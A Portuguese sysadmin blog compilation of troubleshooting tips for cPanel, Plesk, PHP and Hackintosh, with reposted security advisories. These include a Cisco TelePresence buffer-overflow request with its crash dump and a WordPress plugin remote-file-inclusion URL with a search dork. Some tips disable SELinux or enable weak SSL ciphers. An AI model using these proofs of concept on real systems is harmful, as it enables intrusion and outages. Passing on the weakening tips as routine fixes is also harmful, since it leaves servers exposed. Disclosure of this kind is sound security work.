ERROR: Failed to connect to server: Unable to find the socket transport “ssl” GOOGLE APPS com CPANEL

Standard

SMTP -> ERROR: Failed to connect to server: Unable to find the socket transport “ssl” – did you forget to enable it when you configured PHP? (24)

 

Se esse erro ocorre é simples de resolver, não precisa mudar sua classe phpmailer, usar debug true ou mesmo error_reporting(E_ALL) afim de depurar, agora é hora de matar a pau.

Crie um arquivo chamado info.php e dentro dele coloque <?php phpinfo(); ?>

Abra este arquivo pelo site e por fim veja se está ativada a biblioteca openssl, caso esteja o problema será suporte a esse tipo de socket.

Mande que o seu provedor acesse o whm e em exim configurator editor ele marque a opção Allow weak SSL/TLS ciphers, depois de aplicar o whm vai reiniciar o serviço do exim e pronto, é só alegria.

 

PS, atente para estar usando a porta certa e o hostname certo no seu phpmailer :P.

 

$mail->Host = “smtp.gmail.com”;

$mail->SMTPAuth = true;

$mail->Username = “login@dominionoapps.com.br”;

$mail->Password = “senha”;

$mail->SMTPSecure=”ssl”;

$mail->Port=465;

PHP Warning: Module 'timezonedb' already loaded in Unknown on line 0

Standard

Para resolver isto é simples, entre no arquivo php.ini (em rhel based pode ser encontrado em /usr/local/lib/php.ini), bastando apenas entrar e remover as linhas duplicadas que contém:

extension=”timezonedb.so”

Removendo as linhas duplicadas rode: service httpd restart ou /etc/init.d/apache2 restart e curta!

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Standard

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro:

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as coisas, permissões e etc, teremos de desativar o danado :(,

Para desativarmos o SELINUX devemos seguir os passos abaixo:

vim

/etc/sysconfig/selinux
Dentro deste arquivos devemos mudar a linha
SELINUX=permissive (ou enforcing) para:
SELINUX=disabled

Após, basta dar um reboot do dragão e ver que o problema foi sanado :D.

Playing error : Sua instalação do GStreamer está com um plug-in faltando. at /usr/bin/../share/gmusicbrowser/gmusicbrowser_gstreamer-0.10.pm line 135.

Standard

Se essa é a mensagem de erro ao tentar tocar um arquivo MP3 junto ao seu Ubuntu/Xubuntu/Kubuntu, não chore e nem desanime, na verdade o que está rolando é a falta de plugins para stream de audio.
Para sanar isto basta abrir seu terminal e digitar:

sudo apt-get install ubuntu-restricted-extras -y

Serão baixados mais de 100mb de plugins, mas tudo bacana (mp3, flash, mp4, avi e etc…).

Depois disso é só alegria.

Abraços a todos ;P

Client cannot log in. – Home Directory Inccessable

Standard

Se isso acontece com o plesk, verifique se você já fez o seguinte:

1 – Tentou ativar o modo UNIX no ftp.

2 – Verificou se as permissões de pasta no root do ftp estão ok (padrão nas contas de ftp é a pasta httpdocs ou / do vhost do cliente).

3 – Rodou -> “%plesk_bin%\ftpmng.exe” –remove-all “%plesk_bin%\ftpmng.exe” –reconfigure-all

4 – RODOU:

net stop MSFTPSvc
net start MSFTPSvc

5 – Por fim criou o dword HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\InetInfo\Parameters\DisableMemoryCache e deu 1 como valor

SE NÃO rolou nada para o ftp, mesma mensagem de erro? Ainda persiste o erro?

Que tal tentar o FTP para acesso do main ip? LOL, por incrível que pareça as vezes o maion ip precisa ser ajustado como host na conexão de ftp 😉

Use of uninitialized value in string ne at /usr/sbin/ddclient line 1973.

Standard

Se você está usando DEBIAN-BASED (mind/debian/ubuntu) e toda vez que roda o comando ddclient ele apresenta erro SEUS PROBLEMAS “SE ACABARAM-SE”!

Para sanar, como root faça o seguinte:

rm -rf /var/cache/ddclient/ddclient.cache

Depois rode o comando ddclient, a saída vai ser algo semelhante a:
SUCCESS:  updating SEUHOST.ALGUMACOISAg: good: IP address set to IPDASUAINTERFACEWEB

 

Abraços galera

Error from park wrapper: Using nameservers with the following IPs: … Tentando adicionar domínios parkeados (estacionados)

Standard

Para cpanel pt_br, o rvskin mostra esta mensagem:

 

Error from park wrapper: Usando Servidor de Nomes com os seguintes IPs: IP_DO_DNS1,IP_DO_DNS2 Sorry, the domain is already pointed to an IP address that does not appear to use DNS servers as sociated with this server. Please transfer the domain to this servers nameservers or have your administrator add one of its nameservers to /etc/ips.remotedns and make the proper A entries on that remote nameserver.

Naaaaaaaaaaaaaada de Pânico, sanar essa parada é fácil.

Abra o whm como root e em TWEAK SETTINGS clique em DOMAINS e deixe ON a opção:

Allow Remote Domains

Depois disso você vai enviar uma caixa de bis para mim ;).

Como atualizar seu Mac Os X Lion de forma simples

Standard

Bom, pessoALL, estamos colocando esse simples artigo no ar para que possa ajudar pessoas que tem dúvidas/medo de atualizar seu Mac Os X (normalmente isso acontece com quem tem hackintosh).

Esta semana que passou publicamos um artigo sobre a estabilidade pós update do mac os x lion, você pode conferir aqui, o link mostra que não há problemas em atualizar seu hackintosh para 10.7.1 (caso esteja na 10.7.0).

Bom, este artigo vai mostrar como atualizar seu mac de forma MUITO simples.
Vamo que vamo?

Abrir updates do MAC OS X LION

Abrir updates do MAC OS X LION

Clicando no menu principal (Aquela mação linda que fica no canto esquerdo superior do seu Desktop (Apple chama o trem de mesa, pode? [lol])

Feito isto, clicando em ATUALIZAÇÃO DO SOFTWARE ele vai abrir aquela caixa de diálogo central e irá fazer busca por update.

Lembre-se de estar conectado na internet com o Mac que você quer atualizar.

Assim que terminar a busca por updates a mesma caixa de diálogo vai mostrar o que precisa ser atualizado, veja abaixo:

Mostrar Detalhes

Mostrar Detalhes

Nós do AppUnix sempre gostamos de observar DETALHES da update (a Apple não vai roubar seu pc, lol, não precisa olhar), mas, se você for cabreiro pode clicar em detalhes.
No nosso caso só tinha 1 update disponível, a qual marcamos e instalamos numa boa, vejam:

Instalar updates marcadas

Instalar updates marcadas

Assim que clicar em Instalar 1 Item (se marcar mais vai ser exibido Instalar X itens). A Aparência da instalação é simples e mostra uma barra de progresso, veja as imagens abaixo:

Progresso de instalação das updates

Progresso de instalação das updates

Agora veremos a conclusão da update, veja abaixo:

Status de completo (update)

Status de completo (update)

Antes de concluirmos nosso arti queremos lhe notificar que algumas updates críticas (de segurança) requerem o reboot da máquina, se for uma tela aparecerá mandando reiniciar o PC, reinicie sem problemas.
Veja bem, se houver erro pós reboot poderá ocorrer a tela abaixo:

erro no hack

erro no mac

Se este tipo de erro ocorrer basta um simples reboot e o sistema de inicialização vai corrigir o erro de permissões/grupos informado acima.

RESSALTAMOS que em caso de ambientes Hackintosh tome muito cuidado com updates de firmware, pois elas podem ferrar seu ambiente e tchau mac :(.

Desejamos-lhes um excelente final de semana.
Se gostar do artigo dê share, recomende, comente…

Abração galera.
Att: Portal AppUNIX

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

Standard


Sense of Security - Security Advisory - SOS-11-011

Release Date. 20-Sep-2011
Last Update. -
Vendor Notification Date. 22-Mar-2011
Product. NETGEAR Wireless Cable Modem Gateway
CG814WG
Affected versions. Hardware 1.03,
Software V3.9.26 R14 verified,
possibly others
Severity Rating. High
Impact. Authentication bypass,
Cross Site Request Forgery
Attack Vector. Remote without authentication
Solution Status. Upgrade to R15 (by contacting NETGEAR)
CVE reference. Not yet assigned

Details.
The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's
as customer premises equipment within Australia and abroad. It is a
centrally managed ISP solution whereby each ISP's devices run a
customised firmware and configuration changes and updates can be pushed
out as required.

Basic authentication is used as the primary and only authentication
mechanism for the administrator interface on the device. The basic
authentication can be bypassed by sending a valid POST request to the
device without sending any authentication header. The response from the
device sends the user to another page that requests basic
authentication, however at this point the request has already been
processed.

An example of attacks using the basic authentication bypass may include
changing the admin password or enabling the remote admin interface
(Internet facing).

Additionally, due to the lack of CSRF protection in the web application,
the bypass attack can be coupled with CSRF to have a victim enable the
remote admin interface to the Internet, where an attacker can then use
the bypass attack again across the remote admin interface to reset the
admin password and access the device. This attack is possible when
targeting a victim that is behind the NETGEAR device on the same segment
as the web administrator interface whom has browsed to a malicious site
containing the CSRF attack.

NETGEAR was notified of this vulnerability on 22 March 2011, but we
never received a response or acknowledgement of the issue or fix. Sense
of Security notified local ISP's and it was escalated by a local ISP
who worked with NETGEAR to develop and test an update. Sense of Security
was never provided an opportunity to validate the fixes in the latest
firmware version. Given the severity of the issue it would be prudent
for NETGEAR to notify and supply an update to all of its customers.

Proof of Concept.
By embedding the below HTML in a website and having a
victim browse to the website the remote management interface to the
Internet would be enabled. An attacker could then use one of the
hardcoded passwords for the device to access it, or use a basic
authentication bypass to change the admin password. Alternatively, the
attacker could conduct a CSRF attack that implements two POST requests
to have the remote admin interface enabled, and the admin password
changed.

The example here is a basic proof of concept, more complex examples
which include JavaScript redirects to mask the basic authentication
pop-up would be more stealthy.








Solution.
Ask your ISP to obtain the latest firmware from NETGEAR and deploy it
to your device.

Discovered by.
Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17874/

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

Standard


Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco TelePresence Series
Platform. Cisco
Affected versions. C < = TC4.1.2, MXP <= F9.1 Severity Rating. Low - Medium Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service. Solution Status. Vendor patch References. 1. CVE-2011-2544 (CSCtq46488) 2. CVE-2011-2543 (CSCtq46496) 3. CVE-2011-2577 (CSCtq46500) Details. Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input. Examples (MXP): Rebooting the system:
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.

Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.

Proof of Concept: GET
/wsgi/getxml?location="+("A"*5200)+("x60"*4)+("X"*4)+"HTTP/1.1rn
Host: 192.168.6.99rnrn"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037
0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896
0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005
00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac
129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8.
The severity of this issue is compounded by the fact that the main
application runs as root, this could potentially lead to arbitrary code
execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the
receive field causes the system to reboot.

Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss Active task
FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req
from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr.
accessed)

Solution.
Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by.
David Klein, Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the countries largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

Standard


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

Error: Unable to update the mail account properties:mailmng failed: Loaded Postoffice Configuration Provider (MEAIPO.DLL) There are no domains for post office: at (MailEnable::MailEnableMailName::MailEnableMailName line 70) at execute console command –add-mailname(vconsoleapp::start line 132) at execute “C:\Program Files (x86)\Parallels\Plesk\/admin/bin/mailmng” –add-mailname –domain-name= (vconsoleapp::run line 143)

Standard

Recebeu o erro acima?

Existem 2 vertentes para sanar seu problema:

 

1 – O seu PLESK é muito recente e não reconhece a versão do seu Mailenable,

2 – Seu Mailenable está precisando ser reintegrado no plesk.

 

Mesmo que você mande o plesk listar os componentes (procedimentos padrão) ele ainda vai dar erro. Qual a saída?

Entre na pasta de admin do plesk e na pasta bin (VIA MS-DOS) e execute:

mchk.exe --all --fix=all
Deve sanar o problema.

Como resolver problema | erro da AppStore no Hackintosh | Mac OS X Lion

Standard

Olá galera tudo na paz?

Hoje galera vou dar possíveis soluções para um problema que pelo que vi após o aparecimento de um certo Leão que nossa querida Apple soltou por ai vem acontecendo com frequência….

“Your device or computer could not be verified.Contact support for assistance help”

Com Mac OS X Lion, simplismente todos os hardwares que mexi deram essa mensagem ao tentar baixar alguma coisa na app store, nesse artigo vou passar possíveis soluções para resolver tal problema…. Vou confessar a você fiquei quase uma semana tentando resolver esse problema…. tentei várias soluções que para mim não surtiram muito efeito…. vou passar todas e na ordem que acho mais plausível de serem tentadas…. Todas essas soluções envolvem a edição do arquivo com.apple.Boot.plist que fica dentro da pasta Extra na rais de seu HD, temos esse mesmo arquivo na pasta /Library/Preferences/SystemConfiguration, caso essas dicas não dêm certo pelo com.Boot.apple.plist da Extra aconselho a tentativa com com.Boot.apple.plist  do Library/Preferences/SystemConfiguration …. vamos lá então….

OBS: Você não conseguirá editar esse arquivo dentro da pasta Extra ou dentro da pasta /Library/Preferences/SystemConfiguration… será necessário a criação de uma cópia do mesmo em outro local…. por padrão eu crio na Mesa, mas fica a seu critério….

Outra coisa a se lembrar é que todas as dicas aqui postadas foram usadas tendo como bootloader o Chameleon 1020 HMBT, se você usa outro bootloader talvez não seja da mesma a sua solução, talvez até sejam a mesma solução, mas em arquivos de configuração diferentes….

Vamos lá, a primeira coisa a se tentar é, inserir EthernetBuiltIn=Yes no com.Boot.apple.plist, ficando assim

 

<key>EthernetBuiltIn</key>

<string>Yes</string>

 

Após cada tentativa é preciso reboot da máquina….

-Doooguinha não due certo par mim, continuo recebendo “Your device or computer could not be verified.Contact support for assistance help”

Vamos a segunda solução possível… no mesmo arquivo, inserir PCIRoot=0 ou PCIRoot=1, aconselho o Lizard para ficar mais fácil saber que binário utilizar…. Baixe-o aqui  ao executar o aplicativo, verá uma interface igual a essa

Lizard_00

 

Em PCIRoot clique no botão Auto-detect value receberá um alerta dizendo o valor correto a se usar

Lizard_01

 

Agora vá até seu com.Boot.apple.plist e insira da seguinte forma (ai vai depender do valor dado pelo Lizard, mas já posso adiantar que em meus casos deu sempre 0 quando coloquei 1 fiquei sem rede… fica a dica)

 

<key>PCIRoot</key>

<string>0</string>

 

*caso seu Lizard acuse o valor 0(zero)

 

<key>PCIRoot</key>

<string>1</string>

 

*casp seu Lizard acuse o valor 1(um)

 

Tente tbm utilizando os mesmo valores utilizando PCIRootUID=0 ou PCIRootUID=1, ficando

 

<key>PCIRootUID</key>

<string>0</string>

 

ou

 

<key>PCIRootUID</key>

<string>1</string>

 

Lembrando galera…. tem que ter persistência…. eu mesmo tentei todas as combinações possíveis nessas opções acima…. TODAS mesmo….. mas nem uma infelizmente deu certo pra mim…, agora vou dar de lambuja pra você a solução e acho que atenderá muita gente, vamos utilizar o OSXTools para tal…. baixe-o Aqui

Pra você que tem um ambiante parecido com o meu( Asus+Intel+Geforce+Lion subindo em 64Bits), no meu caso possuo uma GeForce 9800GT 1024MB 256bits… para ativação no Mac OS X Lion foi necessária apenas GraphicsEnabler=Yes. Agora para conseguir sanar nosso problema aconselho que utilize a NVEnabler64 (isso para minha primeira indicação de solução para o problema)…

Caso você tenha um ambiente parecido com o eu, faço o seguinte então…. instale essa kext NVEnabler64 utilizando Kext Wizard… após instalar… como de prache pesso que repare as permissões (faça utilizando o próprio Kext Wizard)….. beleza…. agora vamos ao OSXTools, ao executá-lo verá uma interface assim

OSXTools

 

Na parte de baixo do aplicativo verá Add EFI Strings/Boot Flag

OSXTools_1

 

Clique no mesmo e chegará a essa interface

OSXTools_2

 

Na parte superior da tela clique em Ethernet Strings

OSXTools_3

 

Chegará em uma tela onde o aplicativo já fez tudo pra você….

OSXTools_4

 

Utilizaremos somente esse código Hexadecimal em nossa solução

OSXTools_5

 

Copie-o para a área de tranferência

OSXTools_6

 

utilize-o no com.Boot.apple.plist da seguinte forma

 

 <key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>4b00000001000000010000003f000000010000

0002010c00d041030a0000000001010600011c01010600

00007fff0400160000006200750069006c0074002d0069

006e0000000500000001</string>

 

Salve-o (caso precise, pois no Lion tem autosave e você não precisará salvá-lo manualmente), substitua o com.Boot.apple.plist de dentro da pasta Extra ou da pasta /Library/Preferences/SystemConfiguration…. reboot  e pronto… já pode usar seu AppStore até se cansar…. eu vou ser sincero…. só queria conseguir utilizar o AppStore porque estou começando a mexer com desenvolviemnto para  Mac OS | iOS ai ficar baixando essas coisa de lugares inseguro não dá né galera…. mas beleza…. ai você deve estar se perguntando…. Doooguinha, meu vídeo só funciona com String de vídeo… como irei fazer se o divice-properties já está utilizando a string da Ethernet…. calma meu caro… eu te falo….

Primeiro gere a string de vídeo com o programa de sua preferência, aqui utilizo para vídeo sempre o EFI Studio, que tem essa cara…

EFI

 

Selecione sua placa de vídeo na Lista

EFI_1

 

Clique em Add Device

EFI_2

 

Na tela seguinte clique no canto inferior direito em Save Hex

EFI_3

 

Será solicitado local para salvamento do arquivo, faça como preferir

EFI_4

 

Agora você já pode fechar o EFI Studio (ou outro qualquer que esteja usando)…. Vamos ao OSXTools… naquela tela que pegamos a string de Ethernet

Ethernet_String

 

Na parte superior dessa tela clique em Save as Hex

Ethernet_string_1

 

Será solicitado um nome

Ethernet_String_2

 

Um local onde salvar

Ethernet_String_3

 

Receberá mensagem de sucesso

Ethernet_String_4

 

Feche a tela da string de Ethernet voltando a essa tela

Combine_Hexa

 

No canto superior direito existe um Ícone Combine Hex Strings, clique nele

Combine_Hexa_1

 

Chegará nessa tela

Combine_Hexa_2

 

No canto superior esquerdo clicando em Chose Files você irá selecionar os Hexa decimais que você gerou referente a seus Hardwares

Combine_Hexa_3

 

Como puderam ver, meus Hexa Decimais foram salvos na Mesa

Comnie_Hexa_4

 

Agora escolha os Hexas (desculpem a quantidade de arquivos na Mesa, aquilo são screens Shot para fazer esse how to além de kexts para desenvolvimento de pacotes posteriores para facilitar a vida de vocês…..

Combine_Hexa_5

 

Podem ver na tela que ele gerou um Hexadecimal GIGANTE…. agora mescladno o Hexa do Vídeo e o Hexa da Ethernet…. bom, agora vamos pegar essa string copiar para a área de tranferência (Command+C)

Combine_Hexa_6

 

Agora vá até seu com.Boot.apple.plist e insira as seguintes linhas

<key>EthernetBuiltIn</key>

<string>Yes</string>

<key>device-properties</key>

<string>1004000001000000020000003f0000000100000002010
c00d041030a0000000001010600011c0101060000007fff04001600
00006200750069006c0074002d0069006e0000000500000001c5
0300001500000002010c00d041030a0000000001010600000101
01060000007fff04003a000000400032002c00680077007300650
06e0073006f0072002d0070006100720061006d0073002d007600
65007200730069006f006e00000008000000000000022200000
0400032002c006400650076006900630065005f0074007900700
065000000120000004e5644412c6770752d64696f64650e0000004
e00560050004d0000002000000001000000000000000000000
0000000000000000000000000000000001e00000072006f006
d002d007200650076006900730069006f006e00000009000000
3331373261100000004e00560043004100500000001800000004
000000000003000c0000000000000700000000220000004000
32002c002300730069007a0065002d00630065006c006c007300
0000080000000000000022000000400030002c006400650076
006900630065005f00740079007000650000000b000000646973
706c6179100000006d006f00640065006c0000001e0000004e564
9444941204765466f7263652039383030204754204546491400000
0400030002c006e0061006d0065000000120000004e5644412c4
46973706c61792d4120000000400032002c0063006f006d007000
61007400690062006c0065000000160000004e5644412c73656e7
36f722d706172656e7414000000400031002c006e0061006d00650
00000120000004e5644412c446973706c61792d421200000040003
2002c00720065006700000008000000000000021c0000006400
650076006900630065005f007400790070006500000010000000
4e5644412c4765466f72636520000000400031002c0063006f006d
00700061007400690062006c00650000000e0000004e5644412c
4e564d616326000000400032002c002300610064007200650073
0073002d00630065006c006c00730000000800000000000001
0e0000006e0061006d00650000000f0000004e5644412c506172
656e7422000000400031002c006400650076006900630065005f
00740079007000650000000b000000646973706c617920000000
400030002c0063006f006d00700061007400690062006c006500
00000e0000004e5644412c4e564d6163220000005600520041004
d002c0074006f00740061006c00730069007a006500000008000
0000000004036000000400032002c0068007700630074007200
6c002d0070006100720061006d0073002d007600650072007300
69006f006e000000080000000000000214000000400032002c0
06e0061006d00650000001100000073656e736f722d706172656e74

</string>

**Pra não ficar desconfigurado no BLOG precisei fazer ajustes manuais na String… mas usem de acordo com o resultado obtido por ai….

Salve, substituia o com.Boot.apple.plist da pasta Extra ou de Library/Preferences/SystemConfiguration, reinicie sua máquina e faça o teste para ver se está tudo dentro do que nosso how-to lhe propôe… que é conseguir utilizar AppStore em seu Hackintosh… Outra coisa…. tbm existe uma solução no site da própria apple que é a de Excluir o arquivo NetworkInterfaces.plist da pasta Library/Preferences/SystemConfiguration …. mas essa só aconselho se você tiver um pouco de conhecimeno para adicionar novamente as interfaces de rede…. pois com a exclusão desse arquivo você ficará sem interfaces de rede disponíveis lá em preferências do Sitema e consequentemente terá que adicionar todas na mão…. ai fica a seu critério…. fazer ou não vai depender do seu conhecimento para reverter o que a exclusão desse aquivo acarretará…. É isso galera espero que ajude a vocês…. sofri muuito com essa besteira e espera sinceramente que nossos leitores não tenham o mesmo problema que tive….

Espero que dentre as soluções proposta para sanar esse problema você consiga resolver o seu…. Caso não… infelizmente eu não sei como fazer…. Só pra constar nos Autos, essa solução tbm fez com que minha Wireless conseguisse acesso ao AppStore, portanto tornou-se uma solução completa….. resolveu por completo meu problema……Caso tenha dúvida de como inserir essas linhas na qual vou citando aqui… vou deixar para download meu com.Boot.apple.plist… ai é só abrir e verificar como ficou….

Baixe Aqui

Lembrando que utilizei somente string para Ethernet e para vídeo utilizei a kext NVEnabler64

Bom proveito galera…. abraço!!!!!! 😀

Gostou? Comente, complemente e espalhe!

 

/usr/sbin/repquota -auv consumindo toda cpu (100%) OVERLOAD CPANEL

Standard

É, pessoALL, apesar do foco hoje estar 100% no http://www.appunix.com.br ainda uso este blog para dar algumas dicas (FREE) sobre WHM/CPANEL, e uma delas é baseada em um erro que acaba com a alegria de qualquer brazuca (ou sysadmin), um processo irritante que consome 100% da cpu. Este processo é o /usr/sbin/repquota -auv, o qual o cpanel o executa sozinho, do nada (e como quem quer nada), lol, e o pior, não adianta dar killall, kill -9, kill np que ele não encerra, isto é fato!!! Vamos parar de preencher a linguiça e sanar o negócio?

Bem, alguns passos podem ser seguidos para sanar, digamos que irei colocar do nível mais simples ao mais curioso de todos, ok?

Tente o seguinte [como root]:

rm /home/quota.group
rm /home/quota.user

/scripts/fixquotas

Se o processo ainda insistir em ficar como louco checa se seu disco está operando em ready only, uma forma de tentar isto é fazer assim:

touch /home/qualquercoisa e em seguida digitar stat /home/qualquercoisa, se mostrar somente leitura é hora de um reboot (e de preferência um fsck por parte do IDC).

Outro ponto extra é você executar o upcp –force e ver se o processo inicia, caso não, observe na hora (normalmente madrugada) se o processo executa e em seguida opera com o repquota, se isso ocorrer realmente é o versionamento ferrado, mude o estilo de update e faça upcp –force (normalmente release ou stable são os mais recomendados, troque um pelo outro e lembre-se de proteger com chattr os arquivos que lhe são importantes e o cpanel pode os sobrescrever (customizações, por exemplo, em temas do cpanel)).

Vamos finalizar com a dica mais extra?

lsattr /*.user

Se exibir proteções do tipo i–A, meu amigo, tira essa praga daí —-> chattr -iA /*.user

Com isso rode o comando na mão e veja que glorioso.

Se a glória não ocorrer você precisara aprofundar as coisas:

1. Identificar que partições estão usando sistema de quotas,
================
root@appunixlabs [~]# cat /etc/fstab | grep quota
LABEL=/ / ext3 defaults,usrquota 1 1
LABEL=/home /home ext3 defaults,usrquota 1 2
LABEL=/usr /usr ext3 defaults,usrquota 1 2
LABEL=/var /var ext3 defaults,usrquota 1 2
================

2. Reiniciar o Servidor e entrar em Single mode.

3. Rodar um fsck para cada partição (modo forçado)-> fsck -f /dev/sdX#

4. Recriar o sistema de journaling para cada partição. (tune2fs -O ^has_journal /dev/sdX#;tune2fs -O has_journal /dev/sdX#)

5. Rodar um fsck PADRÃO para cada partição.

6. rodar o comando /scripts/fixquotas

7. Reiniciar o sistema.

Ps: Se funcionar lembre-se que um whois neste domínio mostra minha casa, daí é só mandar uma caixa de bis do preto. (LOL)

Device: /dev/hda, 1 Currently unreadable (pending)

Standard

Se você está recebendo a mensagem no seu arquivo /var/log/messages:

Device: /dev/hda, 1 Currently unreadable (pending)

Podendo ser /dev/sdb ou qualquer outra indicação de disco saiba que o hd em questão está “pensando em ir para o saco”, por isso, já mantenha um de reserva.
E se isto é por parte de um idc, solicite a troca de disco imediatamente.